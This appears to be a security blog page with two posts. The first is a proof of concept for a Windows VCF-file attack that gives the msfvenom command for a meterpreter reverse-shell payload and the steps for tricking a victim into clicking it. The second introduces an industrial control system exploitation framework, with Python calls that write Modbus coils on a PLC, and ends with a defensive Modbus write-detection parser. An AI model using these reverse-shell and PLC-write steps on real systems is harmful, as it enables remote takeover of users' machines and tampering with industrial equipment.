
Saturday, 2 February 2019

Exploiting Windows using malicious VCF file

John Page, a cyber security researcher, disclosed this vulnerability, a 0-day exploit that also works on the latest Windows 10.

Introduction: He discovered that if we replace the website in a VCF file with the local path of a ".cpl" file, Windows opens that file locally instead of opening the link in a browser. This is done by replacing "http://" with "http.\\"; alternatively, we can inject some HTML into the email field to do the same, and when the user clicks on it we get a shell. (This exploit requires human interaction.)

Proof Of Concept:

1.   We need to create a simple payload. (I used msfvenom and selected the format ".vbs")
       msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<lport> -f vbs > <file_name>.vbs

2.   Inject HTML with an href pointing to the payload file name inside the email field (both files are in the same folder), and save the file.
      <a href="shell.vbs">alokkumar@gmail.com</a>

3.   Now we have to send this folder to the victim.

4.   Set up multi/handler with the matching options in Metasploit and wait for the victim to click the link.

5.   When the user clicks the link, we get a shell.

This exploit needs user interaction although it is a 0-day. Post your comments below; thanks for reading.

Thursday, 15 March 2018

Industrial Control System Exploitation Framework

Introduction

ISF (Industrial Exploitation Framework): an exploitation framework written in Python and based on the open source project routersploit. It helps us test vulnerabilities in multiple programmable logic controller (PLC) and Industrial Control System (ICS) software products.
Link :- https://github.com/dark-lbp/isf

Modbus: Modbus is a serial communication protocol used to connect industrial electronic devices because it is free and easy to deploy. It has one master and one or more slaves. Each slave has a unique 8-bit device address, or unit number.
Coils and registers are the names of pre-defined variable types mapped to memory addresses. A coil is a boolean (bit) variable and a register is an integer variable. There are discrete inputs (read-only boolean), coils (read-write boolean), input registers (read-only integer), and holding registers (read-write integer).

Requirements

* gnureadline
* requests
* paramiko
* beautifulsoup4
* pysnmp
* python-nmap
* scapy

Exploit modules included in ICSSPLOIT

* s7_300_400_plc_control.py: Siemens S7-300 and S7-400 start/stop.
* vxworks_rpc_dos.py: Works on all VxWorks systems where the Remote Procedure Call (RPC) protocol is enabled (CVE-2015-7599).
* quantum_140_plc_control.py: Schneider Quantum 140 series start/stop.
* crash_qnx_inetd_tcp_service.py: Crash QNX TCP services started with inetd.
* qconn_remote_exec.py: QCONN QNX Neutrino remote command execution vulnerability.

Installation

There is a requirements file whose dependencies can be installed with pip:
pip install -r requirements


PoC

--> Set up a Modbus master and one slave on another machine in the network.

--> Import module
Move to the downloaded isf directory, start python, and import the client:

from icssploit.clients.modbus_tcp_client import ModbusClient

--> Init Client

target = ModbusClient(name='modbus_tcp_client', ip='<IP>')

eg: target = ModbusClient(name='modbus_tcp_client', ip='192.168.0.115')
target.connect()

The Modbus client is now connected to the target.

--> Read Coils

target.read_coils(address=<Address Of Slave>, count=<Count Of Coils>)

eg: target.read_coils(address=100, count=10)

This reads the values of the coils starting at the specified address.

--> Write Coils

target.write_multiple_coils(address=<Address Of Slave>, values=[<Values To Be Written>])

eg: target.write_multiple_coils(address=100, values=[1, 1, 1, 1, 1, 1, 1, 1])

This writes the given values to the coils starting at the specified address.

Now we can read the coils again to confirm the changes made.
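Modbus TCP carries no authentication, so a write like the one above is accepted from any host that can reach the slave on port 502; a defender can spot such writes by decoding the MBAP header and function code in captured traffic. The parser below is an added example, not code from the post or from ISF; the two frames are constructed here to match the read and write calls in the steps above.

```python
import struct

# Modbus function codes from the public protocol specification
READ_COILS = 0x01
WRITE_MULTIPLE_COILS = 0x0F
WRITE_FUNCTIONS = {0x05, 0x06, 0x0F, 0x10, 0x16, 0x17}  # any request that changes state
FUNCTION_NAMES = {0x01: "Read Coils", 0x05: "Write Single Coil", 0x0F: "Write Multiple Coils"}

def parse_modbus_tcp(frame: bytes) -> dict:
    """Decode the 7-byte MBAP header and the PDU of one Modbus TCP request."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError("protocol id must be 0 for Modbus")
    if length != len(frame) - 6:  # length counts unit id + PDU
        raise ValueError("MBAP length field does not match frame size")
    fc, pdu = frame[7], frame[8:]
    info = {"transaction_id": tid, "unit_id": unit, "function_code": fc,
            "function": FUNCTION_NAMES.get(fc, "other"), "is_write": fc in WRITE_FUNCTIONS}
    if fc == READ_COILS:
        info["address"], info["count"] = struct.unpack(">HH", pdu[:4])
    elif fc == WRITE_MULTIPLE_COILS:
        address, count, nbytes = struct.unpack(">HHB", pdu[:5])
        packed = pdu[5:5 + nbytes]
        # coil states are packed eight per byte, least significant bit first
        values = [(packed[i // 8] >> (i % 8)) & 1 for i in range(count)]
        info.update(address=address, count=count, values=values)
    return info

def build_request(tid: int, unit: int, fc: int, body: bytes) -> bytes:
    """Encode one Modbus TCP request; used here only to construct the sample frames below."""
    pdu = bytes([fc]) + body
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

# Constructed samples mirroring the post: read 10 coils at 100, then write eight 1s at 100
READ_FRAME = build_request(1, 1, READ_COILS, struct.pack(">HH", 100, 10))
WRITE_FRAME = build_request(2, 1, WRITE_MULTIPLE_COILS, struct.pack(">HHB", 100, 8, 1) + b"\xff")

def flag_writes(frames) -> list:
    """Return decoded write requests; a monitoring rule would alert on these from unexpected hosts."""
    return [p for p in map(parse_modbus_tcp, frames) if p["is_write"]]

if __name__ == "__main__":
    for frame in (READ_FRAME, WRITE_FRAME):
        print(parse_modbus_tcp(frame))
```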
